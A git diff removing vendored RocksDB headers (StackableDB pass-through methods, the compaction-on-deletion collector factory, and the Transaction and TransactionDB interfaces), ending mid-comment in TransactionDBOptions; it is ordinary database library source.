-  virtual Status CreateColumnFamilies(
-      const ColumnFamilyOptions& options,
-      const std::vector<std::string>& column_family_names,
-      std::vector<ColumnFamilyHandle*>* handles) override {
-    return db_->CreateColumnFamilies(options, column_family_names, handles);
-  }
-
-  virtual Status CreateColumnFamilies(
-      const std::vector<ColumnFamilyDescriptor>& column_families,
-      std::vector<ColumnFamilyHandle*>* handles) override {
-    return db_->CreateColumnFamilies(column_families, handles);
-  }
-
-  virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override {
-    return db_->DropColumnFamily(column_family);
-  }
-
-  virtual Status DropColumnFamilies(
-      const std::vector<ColumnFamilyHandle*>& column_families) override {
-    return db_->DropColumnFamilies(column_families);
-  }
-
-  virtual Status DestroyColumnFamilyHandle(
-      ColumnFamilyHandle* column_family) override {
-    return db_->DestroyColumnFamilyHandle(column_family);
-  }
-
-  using DB::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& val) override {
-    return db_->Put(options, column_family, key, val);
-  }
-
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override {
-    return db_->Get(options, column_family, key, value);
-  }
-
-  using DB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
-    return db_->MultiGet(options, column_family, keys, values);
-  }
-
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) override {
-    return db_->IngestExternalFile(column_family, external_files, options);
-  }
-
-  virtual Status VerifyChecksum() override { return db_->VerifyChecksum(); }
-
-  using DB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
-                           bool* value_found = nullptr) override {
-    return db_->KeyMayExist(options, column_family, key, value, value_found);
-  }
-
-  using DB::Delete;
-  virtual Status Delete(const WriteOptions& wopts,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
-    return db_->Delete(wopts, column_family, key);
-  }
-
-  using DB::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& wopts,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key) override {
-    return db_->SingleDelete(wopts, column_family, key);
-  }
-
-  using DB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override {
-    return db_->Merge(options, column_family, key, value);
-  }
-
-
-  virtual Status Write(const WriteOptions& opts, WriteBatch* updates)
-    override {
-      return db_->Write(opts, updates);
-  }
-
-  using DB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& opts,
-                                ColumnFamilyHandle* column_family) override {
-    return db_->NewIterator(opts, column_family);
-  }
-
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) override {
-    return db_->NewIterators(options, column_families, iterators);
-  }
-
-
-  virtual const Snapshot* GetSnapshot() override {
-    return db_->GetSnapshot();
-  }
-
-  virtual void ReleaseSnapshot(const Snapshot* snapshot) override {
-    return db_->ReleaseSnapshot(snapshot);
-  }
-
-  using DB::GetMapProperty;
-  using DB::GetProperty;
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) override {
-    return db_->GetProperty(column_family, property, value);
-  }
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, double>* value) override {
-    return db_->GetMapProperty(column_family, property, value);
-  }
-
-  using DB::GetIntProperty;
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) override {
-    return db_->GetIntProperty(column_family, property, value);
-  }
-
-  using DB::GetAggregatedIntProperty;
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* value) override {
-    return db_->GetAggregatedIntProperty(property, value);
-  }
-
-  using DB::GetApproximateSizes;
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* r, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) override {
-    return db_->GetApproximateSizes(column_family, r, n, sizes,
-                                    include_flags);
-  }
-
-  using DB::GetApproximateMemTableStats;
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) override {
-    return db_->GetApproximateMemTableStats(column_family, range, count, size);
-  }
-
-  using DB::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override {
-    return db_->CompactRange(options, column_family, begin, end);
-  }
-
-  using DB::CompactFiles;
-  virtual Status CompactFiles(
-      const CompactionOptions& compact_options,
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& input_file_names,
-      const int output_level, const int output_path_id = -1) override {
-    return db_->CompactFiles(
-        compact_options, column_family, input_file_names,
-        output_level, output_path_id);
-  }
-
-  virtual Status PauseBackgroundWork() override {
-    return db_->PauseBackgroundWork();
-  }
-  virtual Status ContinueBackgroundWork() override {
-    return db_->ContinueBackgroundWork();
-  }
-
-  virtual Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) override {
-    return db_->EnableAutoCompaction(column_family_handles);
-  }
-
-  using DB::NumberLevels;
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) override {
-    return db_->NumberLevels(column_family);
-  }
-
-  using DB::MaxMemCompactionLevel;
-  virtual int MaxMemCompactionLevel(ColumnFamilyHandle* column_family)
-      override {
-    return db_->MaxMemCompactionLevel(column_family);
-  }
-
-  using DB::Level0StopWriteTrigger;
-  virtual int Level0StopWriteTrigger(ColumnFamilyHandle* column_family)
-      override {
-    return db_->Level0StopWriteTrigger(column_family);
-  }
-
-  virtual const std::string& GetName() const override {
-    return db_->GetName();
-  }
-
-  virtual Env* GetEnv() const override {
-    return db_->GetEnv();
-  }
-
-  using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override {
-    return db_->GetOptions(column_family);
-  }
-
-  using DB::GetDBOptions;
-  virtual DBOptions GetDBOptions() const override {
-    return db_->GetDBOptions();
-  }
-
-  using DB::Flush;
-  virtual Status Flush(const FlushOptions& fopts,
-                       ColumnFamilyHandle* column_family) override {
-    return db_->Flush(fopts, column_family);
-  }
-
-  virtual Status SyncWAL() override {
-    return db_->SyncWAL();
-  }
-
-  virtual Status FlushWAL(bool sync) override { return db_->FlushWAL(sync); }
-
-#ifndef ROCKSDB_LITE
-
-  virtual Status DisableFileDeletions() override {
-    return db_->DisableFileDeletions();
-  }
-
-  virtual Status EnableFileDeletions(bool force) override {
-    return db_->EnableFileDeletions(force);
-  }
-
-  virtual void GetLiveFilesMetaData(
-      std::vector<LiveFileMetaData>* metadata) override {
-    db_->GetLiveFilesMetaData(metadata);
-  }
-
-  virtual void GetColumnFamilyMetaData(
-      ColumnFamilyHandle *column_family,
-      ColumnFamilyMetaData* cf_meta) override {
-    db_->GetColumnFamilyMetaData(column_family, cf_meta);
-  }
-
-#endif  // ROCKSDB_LITE
-
-  virtual Status GetLiveFiles(std::vector<std::string>& vec, uint64_t* mfs,
-                              bool flush_memtable = true) override {
-      return db_->GetLiveFiles(vec, mfs, flush_memtable);
-  }
-
-  virtual SequenceNumber GetLatestSequenceNumber() const override {
-    return db_->GetLatestSequenceNumber();
-  }
-
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) override {
-    return db_->GetSortedWalFiles(files);
-  }
-
-  virtual Status DeleteFile(std::string name) override {
-    return db_->DeleteFile(name);
-  }
-
-  virtual Status GetDbIdentity(std::string& identity) const override {
-    return db_->GetDbIdentity(identity);
-  }
-
-  using DB::SetOptions;
-  virtual Status SetOptions(ColumnFamilyHandle* column_family_handle,
-                            const std::unordered_map<std::string, std::string>&
-                                new_options) override {
-    return db_->SetOptions(column_family_handle, new_options);
-  }
-
-  virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& new_options)
-      override {
-    return db_->SetDBOptions(new_options);
-  }
-
-  using DB::ResetStats;
-  virtual Status ResetStats() override { return db_->ResetStats(); }
-
-  using DB::GetPropertiesOfAllTables;
-  virtual Status GetPropertiesOfAllTables(
-      ColumnFamilyHandle* column_family,
-      TablePropertiesCollection* props) override {
-    return db_->GetPropertiesOfAllTables(column_family, props);
-  }
-
-  using DB::GetPropertiesOfTablesInRange;
-  virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) override {
-    return db_->GetPropertiesOfTablesInRange(column_family, range, n, props);
-  }
-
-  virtual Status GetUpdatesSince(
-      SequenceNumber seq_number, unique_ptr<TransactionLogIterator>* iter,
-      const TransactionLogIterator::ReadOptions& read_options) override {
-    return db_->GetUpdatesSince(seq_number, iter, read_options);
-  }
-
-  virtual Status SuggestCompactRange(ColumnFamilyHandle* column_family,
-                                     const Slice* begin,
-                                     const Slice* end) override {
-    return db_->SuggestCompactRange(column_family, begin, end);
-  }
-
-  virtual Status PromoteL0(ColumnFamilyHandle* column_family,
-                           int target_level) override {
-    return db_->PromoteL0(column_family, target_level);
-  }
-
-  virtual ColumnFamilyHandle* DefaultColumnFamily() const override {
-    return db_->DefaultColumnFamily();
-  }
-
- protected:
-  DB* db_;
-};
-
-} //  namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/table_properties_collectors.h b/thirdparty/rocksdb/include/rocksdb/utilities/table_properties_collectors.h
deleted file mode 100644
index 0f88270..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/table_properties_collectors.h
+++ /dev/null
@@ -1,29 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <memory>
-
-#include "rocksdb/table_properties.h"
-
-namespace rocksdb {
-
-// Creates a factory of a table property collector that marks a SST
-// file as need-compaction when it observe at least "D" deletion
-// entries in any "N" consecutive entires.
-//
-// @param sliding_window_size "N". Note that this number will be
-//     round up to the smallest multiple of 128 that is no less
-//     than the specified size.
-// @param deletion_trigger "D".  Note that even when "N" is changed,
-//     the specified number for "D" will not be changed.
-extern std::shared_ptr<TablePropertiesCollectorFactory>
-    NewCompactOnDeletionCollectorFactory(
-        size_t sliding_window_size,
-        size_t deletion_trigger);
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/transaction.h b/thirdparty/rocksdb/include/rocksdb/utilities/transaction.h
deleted file mode 100644
index a351973..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/transaction.h
+++ /dev/null
@@ -1,479 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Iterator;
-class TransactionDB;
-class WriteBatchWithIndex;
-
-using TransactionName = std::string;
-
-using TransactionID = uint64_t;
-
-// Provides notification to the caller of SetSnapshotOnNextOperation when
-// the actual snapshot gets created
-class TransactionNotifier {
- public:
-  virtual ~TransactionNotifier() {}
-
-  // Implement this method to receive notification when a snapshot is
-  // requested via SetSnapshotOnNextOperation.
-  virtual void SnapshotCreated(const Snapshot* newSnapshot) = 0;
-};
-
-// Provides BEGIN/COMMIT/ROLLBACK transactions.
-//
-// To use transactions, you must first create either an OptimisticTransactionDB
-// or a TransactionDB.  See examples/[optimistic_]transaction_example.cc for
-// more information.
-//
-// To create a transaction, use [Optimistic]TransactionDB::BeginTransaction().
-//
-// It is up to the caller to synchronize access to this object.
-//
-// See examples/transaction_example.cc for some simple examples.
-//
-// TODO(agiardullo): Not yet implemented
-//  -PerfContext statistics
-//  -Support for using Transactions with DBWithTTL
-class Transaction {
- public:
-  virtual ~Transaction() {}
-
-  // If a transaction has a snapshot set, the transaction will ensure that
-  // any keys successfully written(or fetched via GetForUpdate()) have not
-  // been modified outside of this transaction since the time the snapshot was
-  // set.
-  // If a snapshot has not been set, the transaction guarantees that keys have
-  // not been modified since the time each key was first written (or fetched via
-  // GetForUpdate()).
-  //
-  // Using SetSnapshot() will provide stricter isolation guarantees at the
-  // expense of potentially more transaction failures due to conflicts with
-  // other writes.
-  //
-  // Calling SetSnapshot() has no effect on keys written before this function
-  // has been called.
-  //
-  // SetSnapshot() may be called multiple times if you would like to change
-  // the snapshot used for different operations in this transaction.
-  //
-  // Calling SetSnapshot will not affect the version of Data returned by Get()
-  // methods.  See Transaction::Get() for more details.
-  virtual void SetSnapshot() = 0;
-
-  // Similar to SetSnapshot(), but will not change the current snapshot
-  // until Put/Merge/Delete/GetForUpdate/MultigetForUpdate is called.
-  // By calling this function, the transaction will essentially call
-  // SetSnapshot() for you right before performing the next write/GetForUpdate.
-  //
-  // Calling SetSnapshotOnNextOperation() will not affect what snapshot is
-  // returned by GetSnapshot() until the next write/GetForUpdate is executed.
-  //
-  // When the snapshot is created the notifier's SnapshotCreated method will
-  // be called so that the caller can get access to the snapshot.
-  //
-  // This is an optimization to reduce the likelihood of conflicts that
-  // could occur in between the time SetSnapshot() is called and the first
-  // write/GetForUpdate operation.  Eg, this prevents the following
-  // race-condition:
-  //
-  //   txn1->SetSnapshot();
-  //                             txn2->Put("A", ...);
-  //                             txn2->Commit();
-  //   txn1->GetForUpdate(opts, "A", ...);  // FAIL!
-  virtual void SetSnapshotOnNextOperation(
-      std::shared_ptr<TransactionNotifier> notifier = nullptr) = 0;
-
-  // Returns the Snapshot created by the last call to SetSnapshot().
-  //
-  // REQUIRED: The returned Snapshot is only valid up until the next time
-  // SetSnapshot()/SetSnapshotOnNextSavePoint() is called, ClearSnapshot()
-  // is called, or the Transaction is deleted.
-  virtual const Snapshot* GetSnapshot() const = 0;
-
-  // Clears the current snapshot (i.e. no snapshot will be 'set')
-  //
-  // This removes any snapshot that currently exists or is set to be created
-  // on the next update operation (SetSnapshotOnNextOperation).
-  //
-  // Calling ClearSnapshot() has no effect on keys written before this function
-  // has been called.
-  //
-  // If a reference to a snapshot was retrieved via GetSnapshot(), it will no
-  // longer be valid and should be discarded after a call to ClearSnapshot().
-  virtual void ClearSnapshot() = 0;
-
-  // Prepare the current transation for 2PC
-  virtual Status Prepare() = 0;
-
-  // Write all batched keys to the db atomically.
-  //
-  // Returns OK on success.
-  //
-  // May return any error status that could be returned by DB:Write().
-  //
-  // If this transaction was created by an OptimisticTransactionDB(),
-  // Status::Busy() may be returned if the transaction could not guarantee
-  // that there are no write conflicts.  Status::TryAgain() may be returned
-  // if the memtable history size is not large enough
-  //  (See max_write_buffer_number_to_maintain).
-  //
-  // If this transaction was created by a TransactionDB(), Status::Expired()
-  // may be returned if this transaction has lived for longer than
-  // TransactionOptions.expiration.
-  virtual Status Commit() = 0;
-
-  // Discard all batched writes in this transaction.
-  virtual Status Rollback() = 0;
-
-  // Records the state of the transaction for future calls to
-  // RollbackToSavePoint().  May be called multiple times to set multiple save
-  // points.
-  virtual void SetSavePoint() = 0;
-
-  // Undo all operations in this transaction (Put, Merge, Delete, PutLogData)
-  // since the most recent call to SetSavePoint() and removes the most recent
-  // SetSavePoint().
-  // If there is no previous call to SetSavePoint(), returns Status::NotFound()
-  virtual Status RollbackToSavePoint() = 0;
-
-  // This function is similar to DB::Get() except it will also read pending
-  // changes in this transaction.  Currently, this function will return
-  // Status::MergeInProgress if the most recent write to the queried key in
-  // this batch is a Merge.
-  //
-  // If read_options.snapshot is not set, the current version of the key will
-  // be read.  Calling SetSnapshot() does not affect the version of the data
-  // returned.
-  //
-  // Note that setting read_options.snapshot will affect what is read from the
-  // DB but will NOT change which keys are read from this transaction (the keys
-  // in this transaction do not yet belong to any snapshot and will be fetched
-  // regardless).
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     std::string* value) = 0;
-
-  // An overload of the the above method that receives a PinnableSlice
-  // For backward compatiblity a default implementation is provided
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* pinnable_val) {
-    assert(pinnable_val != nullptr);
-    auto s = Get(options, column_family, key, pinnable_val->GetSelf());
-    pinnable_val->PinSelf();
-    return s;
-  }
-
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     std::string* value) = 0;
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     PinnableSlice* pinnable_val) {
-    assert(pinnable_val != nullptr);
-    auto s = Get(options, key, pinnable_val->GetSelf());
-    pinnable_val->PinSelf();
-    return s;
-  }
-
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys, std::vector<std::string>* values) = 0;
-
-  virtual std::vector<Status> MultiGet(const ReadOptions& options,
-                                       const std::vector<Slice>& keys,
-                                       std::vector<std::string>* values) = 0;
-
-  // Read this key and ensure that this transaction will only
-  // be able to be committed if this key is not written outside this
-  // transaction after it has first been read (or after the snapshot if a
-  // snapshot is set in this transaction).  The transaction behavior is the
-  // same regardless of whether the key exists or not.
-  //
-  // Note: Currently, this function will return Status::MergeInProgress
-  // if the most recent write to the queried key in this batch is a Merge.
-  //
-  // The values returned by this function are similar to Transaction::Get().
-  // If value==nullptr, then this function will not read any data, but will
-  // still ensure that this key cannot be written to by outside of this
-  // transaction.
-  //
-  // If this transaction was created by an OptimisticTransaction, GetForUpdate()
-  // could cause commit() to fail.  Otherwise, it could return any error
-  // that could be returned by DB::Get().
-  //
-  // If this transaction was created by a TransactionDB, it can return
-  // Status::OK() on success,
-  // Status::Busy() if there is a write conflict,
-  // Status::TimedOut() if a lock could not be acquired,
-  // Status::TryAgain() if the memtable history size is not large enough
-  //  (See max_write_buffer_number_to_maintain)
-  // Status::MergeInProgress() if merge operations cannot be resolved.
-  // or other errors if this key could not be read.
-  virtual Status GetForUpdate(const ReadOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key, std::string* value,
-                              bool exclusive = true) = 0;
-
-  // An overload of the the above method that receives a PinnableSlice
-  // For backward compatiblity a default implementation is provided
-  virtual Status GetForUpdate(const ReadOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key, PinnableSlice* pinnable_val,
-                              bool exclusive = true) {
-    if (pinnable_val == nullptr) {
-      std::string* null_str = nullptr;
-      return GetForUpdate(options, key, null_str);
-    } else {
-      auto s = GetForUpdate(options, key, pinnable_val->GetSelf());
-      pinnable_val->PinSelf();
-      return s;
-    }
-  }
-
-  virtual Status GetForUpdate(const ReadOptions& options, const Slice& key,
-                              std::string* value, bool exclusive = true) = 0;
-
-  virtual std::vector<Status> MultiGetForUpdate(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys, std::vector<std::string>* values) = 0;
-
-  virtual std::vector<Status> MultiGetForUpdate(
-      const ReadOptions& options, const std::vector<Slice>& keys,
-      std::vector<std::string>* values) = 0;
-
-  // Returns an iterator that will iterate on all keys in the default
-  // column family including both keys in the DB and uncommitted keys in this
-  // transaction.
-  //
-  // Setting read_options.snapshot will affect what is read from the
-  // DB but will NOT change which keys are read from this transaction (the keys
-  // in this transaction do not yet belong to any snapshot and will be fetched
-  // regardless).
-  //
-  // Caller is responsible for deleting the returned Iterator.
-  //
-  // The returned iterator is only valid until Commit(), Rollback(), or
-  // RollbackToSavePoint() is called.
-  virtual Iterator* GetIterator(const ReadOptions& read_options) = 0;
-
-  virtual Iterator* GetIterator(const ReadOptions& read_options,
-                                ColumnFamilyHandle* column_family) = 0;
-
-  // Put, Merge, Delete, and SingleDelete behave similarly to the corresponding
-  // functions in WriteBatch, but will also do conflict checking on the
-  // keys being written.
-  //
-  // If this Transaction was created on an OptimisticTransactionDB, these
-  // functions should always return Status::OK().
-  //
-  // If this Transaction was created on a TransactionDB, the status returned
-  // can be:
-  // Status::OK() on success,
-  // Status::Busy() if there is a write conflict,
-  // Status::TimedOut() if a lock could not be acquired,
-  // Status::TryAgain() if the memtable history size is not large enough
-  //  (See max_write_buffer_number_to_maintain)
-  // or other errors on unexpected failures.
-  virtual Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) = 0;
-  virtual Status Put(const Slice& key, const Slice& value) = 0;
-  virtual Status Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-                     const SliceParts& value) = 0;
-  virtual Status Put(const SliceParts& key, const SliceParts& value) = 0;
-
-  virtual Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) = 0;
-  virtual Status Merge(const Slice& key, const Slice& value) = 0;
-
-  virtual Status Delete(ColumnFamilyHandle* column_family,
-                        const Slice& key) = 0;
-  virtual Status Delete(const Slice& key) = 0;
-  virtual Status Delete(ColumnFamilyHandle* column_family,
-                        const SliceParts& key) = 0;
-  virtual Status Delete(const SliceParts& key) = 0;
-
-  virtual Status SingleDelete(ColumnFamilyHandle* column_family,
-                              const Slice& key) = 0;
-  virtual Status SingleDelete(const Slice& key) = 0;
-  virtual Status SingleDelete(ColumnFamilyHandle* column_family,
-                              const SliceParts& key) = 0;
-  virtual Status SingleDelete(const SliceParts& key) = 0;
-
-  // PutUntracked() will write a Put to the batch of operations to be committed
-  // in this transaction.  This write will only happen if this transaction
-  // gets committed successfully.  But unlike Transaction::Put(),
-  // no conflict checking will be done for this key.
-  //
-  // If this Transaction was created on a TransactionDB, this function will
-  // still acquire locks necessary to make sure this write doesn't cause
-  // conflicts in other transactions and may return Status::Busy().
-  virtual Status PutUntracked(ColumnFamilyHandle* column_family,
-                              const Slice& key, const Slice& value) = 0;
-  virtual Status PutUntracked(const Slice& key, const Slice& value) = 0;
-  virtual Status PutUntracked(ColumnFamilyHandle* column_family,
-                              const SliceParts& key,
-                              const SliceParts& value) = 0;
-  virtual Status PutUntracked(const SliceParts& key,
-                              const SliceParts& value) = 0;
-
-  virtual Status MergeUntracked(ColumnFamilyHandle* column_family,
-                                const Slice& key, const Slice& value) = 0;
-  virtual Status MergeUntracked(const Slice& key, const Slice& value) = 0;
-
-  virtual Status DeleteUntracked(ColumnFamilyHandle* column_family,
-                                 const Slice& key) = 0;
-
-  virtual Status DeleteUntracked(const Slice& key) = 0;
-  virtual Status DeleteUntracked(ColumnFamilyHandle* column_family,
-                                 const SliceParts& key) = 0;
-  virtual Status DeleteUntracked(const SliceParts& key) = 0;
-
-  // Similar to WriteBatch::PutLogData
-  virtual void PutLogData(const Slice& blob) = 0;
-
-  // By default, all Put/Merge/Delete operations will be indexed in the
-  // transaction so that Get/GetForUpdate/GetIterator can search for these
-  // keys.
-  //
-  // If the caller does not want to fetch the keys about to be written,
-  // they may want to avoid indexing as a performance optimization.
-  // Calling DisableIndexing() will turn off indexing for all future
-  // Put/Merge/Delete operations until EnableIndexing() is called.
-  //
-  // If a key is Put/Merge/Deleted after DisableIndexing is called and then
-  // is fetched via Get/GetForUpdate/GetIterator, the result of the fetch is
-  // undefined.
-  virtual void DisableIndexing() = 0;
-  virtual void EnableIndexing() = 0;
-
-  // Returns the number of distinct Keys being tracked by this transaction.
-  // If this transaction was created by a TransactinDB, this is the number of
-  // keys that are currently locked by this transaction.
-  // If this transaction was created by an OptimisticTransactionDB, this is the
-  // number of keys that need to be checked for conflicts at commit time.
-  virtual uint64_t GetNumKeys() const = 0;
-
-  // Returns the number of Puts/Deletes/Merges that have been applied to this
-  // transaction so far.
-  virtual uint64_t GetNumPuts() const = 0;
-  virtual uint64_t GetNumDeletes() const = 0;
-  virtual uint64_t GetNumMerges() const = 0;
-
-  // Returns the elapsed time in milliseconds since this Transaction began.
-  virtual uint64_t GetElapsedTime() const = 0;
-
-  // Fetch the underlying write batch that contains all pending changes to be
-  // committed.
-  //
-  // Note:  You should not write or delete anything from the batch directly and
-  // should only use the functions in the Transaction class to
-  // write to this transaction.
-  virtual WriteBatchWithIndex* GetWriteBatch() = 0;
-
-  // Change the value of TransactionOptions.lock_timeout (in milliseconds) for
-  // this transaction.
-  // Has no effect on OptimisticTransactions.
-  virtual void SetLockTimeout(int64_t timeout) = 0;
-
-  // Return the WriteOptions that will be used during Commit()
-  virtual WriteOptions* GetWriteOptions() = 0;
-
-  // Reset the WriteOptions that will be used during Commit().
-  virtual void SetWriteOptions(const WriteOptions& write_options) = 0;
-
-  // If this key was previously fetched in this transaction using
-  // GetForUpdate/MultigetForUpdate(), calling UndoGetForUpdate will tell
-  // the transaction that it no longer needs to do any conflict checking
-  // for this key.
-  //
-  // If a key has been fetched N times via GetForUpdate/MultigetForUpdate(),
-  // then UndoGetForUpdate will only have an effect if it is also called N
-  // times.  If this key has been written to in this transaction,
-  // UndoGetForUpdate() will have no effect.
-  //
-  // If SetSavePoint() has been called after the GetForUpdate(),
-  // UndoGetForUpdate() will not have any effect.
-  //
-  // If this Transaction was created by an OptimisticTransactionDB,
-  // calling UndoGetForUpdate can affect whether this key is conflict checked
-  // at commit time.
-  // If this Transaction was created by a TransactionDB,
-  // calling UndoGetForUpdate may release any held locks for this key.
-  virtual void UndoGetForUpdate(ColumnFamilyHandle* column_family,
-                                const Slice& key) = 0;
-  virtual void UndoGetForUpdate(const Slice& key) = 0;
-
-  virtual Status RebuildFromWriteBatch(WriteBatch* src_batch) = 0;
-
-  virtual WriteBatch* GetCommitTimeWriteBatch() = 0;
-
-  virtual void SetLogNumber(uint64_t log) { log_number_ = log; }
-
-  virtual uint64_t GetLogNumber() const { return log_number_; }
-
-  virtual Status SetName(const TransactionName& name) = 0;
-
-  virtual TransactionName GetName() const { return name_; }
-
-  virtual TransactionID GetID() const { return 0; }
-
-  virtual bool IsDeadlockDetect() const { return false; }
-
-  virtual std::vector<TransactionID> GetWaitingTxns(uint32_t* column_family_id,
-                                                    std::string* key) const {
-    assert(false);
-    return std::vector<TransactionID>();
-  }
-
-  enum TransactionState {
-    STARTED = 0,
-    AWAITING_PREPARE = 1,
-    PREPARED = 2,
-    AWAITING_COMMIT = 3,
-    COMMITED = 4,
-    AWAITING_ROLLBACK = 5,
-    ROLLEDBACK = 6,
-    LOCKS_STOLEN = 7,
-  };
-
-  TransactionState GetState() const { return txn_state_; }
-  void SetState(TransactionState state) { txn_state_ = state; }
-
- protected:
-  explicit Transaction(const TransactionDB* db) {}
-  Transaction() {}
-
-  // the log in which the prepared section for this txn resides
-  // (for two phase commit)
-  uint64_t log_number_;
-  TransactionName name_;
-
-  // Execution status of the transaction.
-  std::atomic<TransactionState> txn_state_;
-
- private:
-  // No copying allowed
-  Transaction(const Transaction&);
-  void operator=(const Transaction&);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db.h
deleted file mode 100644
index 7704389..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db.h
+++ /dev/null
@@ -1,226 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/utilities/transaction.h"
-
-// Database with Transaction support.
-//
-// See transaction.h and examples/transaction_example.cc
-
-namespace rocksdb {
-
-class TransactionDBMutexFactory;
-
-enum TxnDBWritePolicy {
-  WRITE_COMMITTED = 0,  // write only the committed data
-  // TODO(myabandeh): Not implemented yet
-  WRITE_PREPARED,  // write data after the prepare phase of 2pc
-  // TODO(myabandeh): Not implemented yet
-  WRITE_UNPREPARED  // write data before the prepare phase of 2pc
-};
-
-const uint32_t kInitialMaxDeadlocks = 5;
-
-struct TransactionDBOptions {
-  // Specifies the maximum number of keys that can be locked at the same time
-  // per column family.
-  // If the number of locked keys is greater than max_num_locks, transaction
-  // writes (or GetForUpdate) will return an error.
-  // If this value is not positive, no limit will be enforced.
-  int64_t max_num_locks = -1;
-
-  // Stores the number of latest deadlocks to track
-  uint32_t max_num_deadlocks = kInitialMaxDeadlocks;
-
-  // Increasing this value will increase the concurrency by dividing the lock
-  // table (per column family) into more sub-tables, each with their own
-  // separate
-  // mutex.
-  size_t num_stripes = 16;
-
-  // If positive, specifies the default wait timeout in milliseconds when
-  // a transaction attempts to lock a key if not specified by
-  // TransactionOptions::lock_timeout.
-  //
-  // If 0, no waiting is done if a lock cannot instantly be acquired.
-  // If negative, there is no timeout.  Not using a timeout is not recommended
-  // as it can lead to deadlocks.  Currently, there is no deadlock-detection to
-  // recover
-  // from a deadlock.
-  int64_t transaction_lock_timeout = 1000;  // 1 second
-
-  // If positive, specifies the wait timeout in milliseconds when writing a key
-  // OUTSIDE of a transaction (ie by calling DB::Put(),Merge(),Delete(),Write()
